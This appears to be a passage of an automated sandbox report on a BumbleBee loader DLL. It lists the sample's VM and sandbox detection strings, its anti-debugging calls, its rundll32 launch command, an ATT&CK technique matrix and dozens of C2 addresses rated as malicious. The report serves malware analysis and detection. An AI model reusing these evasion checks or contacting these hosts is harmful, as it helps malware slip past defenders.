              Source: WerFault.exe, 00000019.00000003.535159919.000001F5F35BF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.541980614.000001F5F35BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWi
              Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
              Source: rundll32.exeBinary or memory string: VBoxTrayToolWndClass
              Source: rundll32.exeBinary or memory string: \\.\pipe\VBoxTrayIPC
              Source: WerFault.exe, 00000019.00000002.540993777.000001F5F18BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
              Source: rundll32.exeBinary or memory string: System32\drivers\VBoxMouse.sys
              Source: rundll32.exeBinary or memory string: System32\vboxhook.dll
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPCVBoxTrayToolWndClassChecking device %s VirtualBox Shared FoldersVBoxTrayToolWndvboxtray.exevboxservice.exeSELECT * FROM Win32_NetworkAdapterConfigurationChecking VirtualBox process %s 08:00:27MACAddressVBoxVideoW8vboxvideoSELECT * FROM Win32_NTEventlogFileVBoxWddmSystemFileNameVirtualBoxSourcesVBOXvboxDeviceIdSELECT * FROM Win32_PnPEntityNamePCI\VEN_80EE&DEV_CAFE82441FX82801FBOpenHCD82371SBACPIBus_BUS_0SELECT * FROM Win32_BusPNP_BUS_0PCI_BUS_0ProductSELECT * FROM Win32_BaseBoardManufacturerVirtualBoxSELECT * FROM Win32_PnPDeviceOracle CorporationPNPDeviceIDCaptionVEN_VBOXqemu-ga.exeQEMUvdservice.exevdagent.exeqemu-gaChecking qemu processes %s Checking QEMU directory %s SPICE Guest ToolsQEMUqemuBXPCBOCHSSOFTWARE\Winewine_get_unix_file_nameSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\netkvmSYSTEM\ControlSet001\Services\BalloonServiceSystem32\drivers\netkvm.sysSystem32\drivers\balloon.sysSystem32\drivers\viofs.sysSystem32\drivers\pvpanic.sysSystem32\drivers\vioinput.sysSystem32\drivers\viogpudo.sysSystem32\drivers\vioscsi.sysSystem32\drivers\viorng.sysSystem32\drivers\viostor.sysSystem32\drivers\vioser.sysVirtio-Win\CurrentUserEmilySandboxHong LeeHAPUBWSJohnsonIT-ADMINmilozsMillertimmyPeter Wilsonmalwaresand boxtest usermaltestJohn DoevirusChecking if username matches : %s VMWareSELECT * FROM Win32_ComputerSystemHVM domUModelprocexp64.exeDesktopprl_cc.exeChecking Parallels processes: %sprl_tools.exe
              Source: rundll32.exeBinary or memory string: System32\vboxmrxnp.dll
              Source: rundll32.exe, 0000000E.00000003.542606221.000002151E55E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.546717139.00000285C5F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: rundll32.exeBinary or memory string: VMUSrvc.exe
              Source: WerFault.exe, 00000017.00000002.542008698.000001CE1EA6F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.532035053.000001CE1EA6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWetry.microsoft.com
              Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
              Source: rundll32.exeBinary or memory string: qemu-ga
              Source: WerFault.exe, 00000019.00000003.531127482.000001F5F35C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWi%SystemRoot%\system32\mswsock.dllCommon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
              Source: rundll32.exeBinary or memory string: System32\drivers\VBoxGuest.sys
              Source: WerFault.exe, 00000018.00000003.530557486.0000018686244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWTH%SystemRoot%\system32\mswsock.dlllfons\AppData\LocalLOGONSERVER=\\computer
              Source: rundll32.exeBinary or memory string: VMSrvc.exe
              Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
              Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxService
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >VMUSrvc.exeVMSrvc.exeChecking Virtual PC processes %s
              Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
              Source: rundll32.exeBinary or memory string: VMWare
              Source: rundll32.exeBinary or memory string: System32\vboxservice.exe
              Source: rundll32.exeBinary or memory string: Checking QEMU directory %s
              Source: WerFault.exe, 00000018.00000002.541137565.0000018686244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWTH`P=
              Source: rundll32.exeBinary or memory string: \\.\VBoxGuest
              Source: rundll32.exeBinary or memory string: vboxservice.exe
              Source: rundll32.exeBinary or memory string: System32\vboxtray.exe
              Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
              Source: rundll32.exeBinary or memory string: System32\drivers\VBoxSF.sys
              Source: WerFault.exe, 00000018.00000002.540850125.00000186843CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWDH
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C5490 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,SysAllocString,_com_issue_error,VariantInit,VariantInit,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,14_2_00000215205C5490
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EF3D4 GetProcessHeap,2_2_00007FFA535EF3D4
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E372C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E372C
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F5204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFA535F5204
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FA8B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000215205FA8B0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520627470 SetUnhandledExceptionFilter,14_2_0000021520627470
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205F5DD8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000215205F5DD8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F5204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FFA535F5204
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E372C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFA535E372C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80C5DD8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000285C80C5DD8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80F7470 SetUnhandledExceptionFilter,19_2_00000285C80F7470
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CA8B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000285C80CA8B0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Searches for specific processes (likely to inject)
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,14_2_00000215205D0330
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80A0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,19_2_00000285C80A0330
              Sets debug register (to hijack the execution of another thread)
              Source: C:\Windows\System32\rundll32.exeThread register set: 6960 A0Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_0000021520611FB0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00000215206120E8
              Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,14_2_00000215205F41C0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_000002152060C574
              Source: C:\Windows\System32\rundll32.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,14_2_00000215205F47D8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_000002152060CB80
              Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,14_2_00000215206116FC
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_0000021520611A08
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_0000021520611AD8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_0000021520611B70
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_0000021520611DB4
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0000021520611F00
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80E1A08
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80E1AD8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_00000285C80E1B70
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80E1DB4
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_00000285C80E1F00
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80E1FB0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00000285C80E20E8
              Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,19_2_00000285C80C41C0
              Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,19_2_00000285C80E16FC
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80DCB80
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80DC574
              Source: C:\Windows\System32\rundll32.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,19_2_00000285C80C47D8
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F1AD0 cpuid 2_2_00007FFA535F1AD0
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E3628 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FFA535E3628
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EB2BC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFA535EB2BC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205CF810 GetUserNameW,14_2_00000215205CF810
              Source: rundll32.exeBinary or memory string: procmon.exe
              Source: rundll32.exeBinary or memory string: tcpview.exe
              Source: rundll32.exeBinary or memory string: Wireshark.exe
              Source: rundll32.exeBinary or memory string: procexp.exe
              Source: rundll32.exeBinary or memory string: LordPE.exe
              Source: rundll32.exeBinary or memory string: autoruns.exe
              Source: rundll32.exeBinary or memory string: ollydbg.exe
              Source: rundll32.exeBinary or memory string: regmon.exe

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Windows Management Instrumentation              		Path Interception212
              Process Injection              		1
              Disable or Modify Tools              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts331
              Virtualization/Sandbox Evasion              		LSASS Memory551
              Security Software Discovery              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Native API              		Logon Script (Windows)Logon Script (Windows)212
              Process Injection              		Security Account Manager331
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Deobfuscate/Decode Files or Information              		NTDS11
              Process Discovery              		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Rundll32              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              File and Directory Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing222
              System Information Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 659464 Sample: o7m2se.dll Startdate: 08/07/2022 Architecture: WINDOWS Score: 100 48 Multi AV Scanner detection for domain / URL 2->48 50 Antivirus detection for URL or domain 2->50 52 Yara detected BumbleBee 2->52 54 2 other signatures 2->54 8 loaddll64.exe 1 2->8         started        process3 process4 10 rundll32.exe 8->10         started        13 rundll32.exe 8->13         started        15 rundll32.exe 8->15         started        17 5 other processes 8->17 signatures5 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->56 58 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 10->58 60 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->60 66 2 other signatures 10->66 19 WerFault.exe 17 9 10->19         started        62 Sets debug register (to hijack the execution of another thread) 13->62 64 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->64 22 WerFault.exe 4 9 17->22         started        25 rundll32.exe 17->25         started        27 WerFault.exe 9 17->27         started        29 4 other processes 17->29 process6 dnsIp7 34 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 19->34 dropped 46 192.168.2.1 unknown unknown 22->46 36 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 22->36 dropped 31 WerFault.exe 9 25->31         started        38 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 27->38 dropped 40 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 29->40 dropped 42 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 29->42 dropped file8 process9 file10 44 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 31->44 dropped

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              249.112.226.98:2430%VirustotalBrowse
              249.112.226.98:2430%Avira URL Cloudsafe
              117.172.191.115:4712%VirustotalBrowse
              117.172.191.115:471100%Avira URL Cloudmalware
              23.19.58.212:4438%VirustotalBrowse
              23.19.58.212:443100%Avira URL Cloudmalware
              169.197.227.201:4742%VirustotalBrowse
              169.197.227.201:474100%Avira URL Cloudmalware
              62.82.188.190:2340%Avira URL Cloudsafe
              41.15.71.157:2740%Avira URL Cloudsafe
              36.201.196.202:367100%Avira URL Cloudmalware
              89.159.155.176:455100%Avira URL Cloudmalware
              74.230.15.244:376100%Avira URL Cloudmalware
              154.56.0.113:443100%Avira URL Cloudmalware
              28.23.200.103:366100%Avira URL Cloudmalware
              185.165.82.120:1820%Avira URL Cloudsafe
              4.177.13.86:289100%Avira URL Cloudmalware
              116.241.116.41:410100%Avira URL Cloudmalware
              231.228.102.246:1860%Avira URL Cloudsafe
              66.15.189.146:122100%Avira URL Cloudmalware
              104.168.200.192:443100%Avira URL Cloudmalware
              133.99.126.202:263100%Avira URL Cloudmalware
              249.57.205.117:1660%Avira URL Cloudsafe
              196.168.84.24:372100%Avira URL Cloudmalware
              179.5.59.188:2280%Avira URL Cloudsafe
              222.202.140.206:438100%Avira URL Cloudmalware
              204.223.28.129:424100%Avira URL Cloudmalware
              41.70.42.112:452100%Avira URL Cloudmalware
              74.219.241.225:481100%Avira URL Cloudmalware
              221.131.148.148:357100%Avira URL Cloudmalware
              143.27.231.233:335100%Avira URL Cloudmalware
              128.79.29.175:298100%Avira URL Cloudmalware
              170.88.0.154:120100%Avira URL Cloudmalware
              206.245.228.10:133100%Avira URL Cloudmalware
              130.242.219.205:423100%Avira URL Cloudmalware
              218.155.13.204:130100%Avira URL Cloudmalware
              158.208.5.127:2690%Avira URL Cloudsafe
              51.68.146.186:4430%Avira URL Cloudsafe
              185.69.113.39:124100%Avira URL Cloudmalware
              205.160.222.15:274100%Avira URL Cloudmalware
              165.132.190.127:368100%Avira URL Cloudmalware
              47.26.53.19:1950%Avira URL Cloudsafe
              191.190.49.225:1910%Avira URL Cloudsafe
              138.141.158.45:2170%Avira URL Cloudsafe
              120.181.249.142:177100%Avira URL Cloudmalware
              116.205.234.96:247100%Avira URL Cloudmalware
              209.244.102.105:112100%Avira URL Cloudmalware
              173.200.61.240:100100%Avira URL Cloudmalware
              159.248.192.111:424100%Avira URL Cloudmalware
              94.88.121.46:403100%Avira URL Cloudmalware
              66.9.9.138:1540%Avira URL Cloudsafe
              242.232.106.206:1620%Avira URL Cloudsafe
              217.246.42.10:346100%Avira URL Cloudmalware
              246.134.183.74:3640%Avira URL Cloudsafe
              146.70.106.76:4430%Avira URL Cloudsafe
              118.89.112.82:338100%Avira URL Cloudmalware
              219.110.187.248:435100%Avira URL Cloudmalware
              146.19.173.184:443100%Avira URL Cloudmalware
              10.195.46.61:4890%Avira URL Cloudsafe
              79.196.23.192:106100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              249.112.226.98:243true
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              117.172.191.115:471true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              23.19.58.212:443true
              • 8%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              169.197.227.201:474true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              62.82.188.190:234true
              • Avira URL Cloud: safe
              		unknown
              41.15.71.157:274true
              • Avira URL Cloud: safe
              		unknown
              36.201.196.202:367true
              • Avira URL Cloud: malware
              		unknown
              89.159.155.176:455true
              • Avira URL Cloud: malware
              		unknown
              74.230.15.244:376true
              • Avira URL Cloud: malware
              		unknown
              154.56.0.113:443true
              • Avira URL Cloud: malware
              		unknown
              28.23.200.103:366true
              • Avira URL Cloud: malware
              		unknown
              185.165.82.120:182true
              • Avira URL Cloud: safe
              		unknown
              4.177.13.86:289true
              • Avira URL Cloud: malware
              		unknown
              116.241.116.41:410true
              • Avira URL Cloud: malware
              		unknown
              231.228.102.246:186true
              • Avira URL Cloud: safe
              		unknown
              66.15.189.146:122true
              • Avira URL Cloud: malware
              		unknown
              104.168.200.192:443true
              • Avira URL Cloud: malware
              		unknown
              133.99.126.202:263true
              • Avira URL Cloud: malware
              		unknown
              249.57.205.117:166true
              • Avira URL Cloud: safe
              		unknown
              196.168.84.24:372true
              • Avira URL Cloud: malware
              		unknown
              179.5.59.188:228true
              • Avira URL Cloud: safe
              		unknown
              222.202.140.206:438true
              • Avira URL Cloud: malware
              		unknown
              204.223.28.129:424true
              • Avira URL Cloud: malware
              		unknown
              41.70.42.112:452true
              • Avira URL Cloud: malware
              		unknown
              74.219.241.225:481true
              • Avira URL Cloud: malware
              		unknown
              221.131.148.148:357true
              • Avira URL Cloud: malware
              		unknown
              143.27.231.233:335true
              • Avira URL Cloud: malware
              		unknown
              128.79.29.175:298true
              • Avira URL Cloud: malware
              		unknown
              170.88.0.154:120true
              • Avira URL Cloud: malware
              		unknown
              206.245.228.10:133true
              • Avira URL Cloud: malware
              		unknown
              130.242.219.205:423true
              • Avira URL Cloud: malware
              		unknown
              218.155.13.204:130true
              • Avira URL Cloud: malware
              		unknown
              158.208.5.127:269true
              • Avira URL Cloud: safe
              		unknown
              51.68.146.186:443true
              • Avira URL Cloud: safe
              		unknown
              185.69.113.39:124true
              • Avira URL Cloud: malware
              		unknown
              205.160.222.15:274true
              • Avira URL Cloud: malware
              		unknown
              165.132.190.127:368true
              • Avira URL Cloud: malware
              		unknown
              47.26.53.19:195true
              • Avira URL Cloud: safe
              		unknown
              191.190.49.225:191true
              • Avira URL Cloud: safe
              		unknown
              138.141.158.45:217true
              • Avira URL Cloud: safe
              		unknown
              120.181.249.142:177true
              • Avira URL Cloud: malware
              		unknown
              116.205.234.96:247true
              • Avira URL Cloud: malware
              		unknown
              209.244.102.105:112true
              • Avira URL Cloud: malware
              		unknown
              173.200.61.240:100true
              • Avira URL Cloud: malware
              		unknown
              159.248.192.111:424true
              • Avira URL Cloud: malware
              		unknown
              94.88.121.46:403true
              • Avira URL Cloud: malware
              		unknown
              66.9.9.138:154true
              • Avira URL Cloud: safe
              		unknown
              242.232.106.206:162true
              • Avira URL Cloud: safe
              		unknown
              217.246.42.10:346true
              • Avira URL Cloud: malware
              		unknown
              246.134.183.74:364true
              • Avira URL Cloud: safe
              		unknown
              146.70.106.76:443true
              • Avira URL Cloud: safe
              		unknown
              118.89.112.82:338true
              • Avira URL Cloud: malware
              		unknown
              219.110.187.248:435true
              • Avira URL Cloud: malware
              		unknown
              146.19.173.184:443true
              • Avira URL Cloud: malware
              		unknown
              10.195.46.61:489true
              • Avira URL Cloud: safe
              		unknown
              79.196.23.192:106true
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:35.0.0 Citrine
              Analysis ID:659464
              Start date and time: 08/07/202207:54:152022-07-08 07:54:15 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:o7m2se.dll
              Cookbook file name:default.jbs
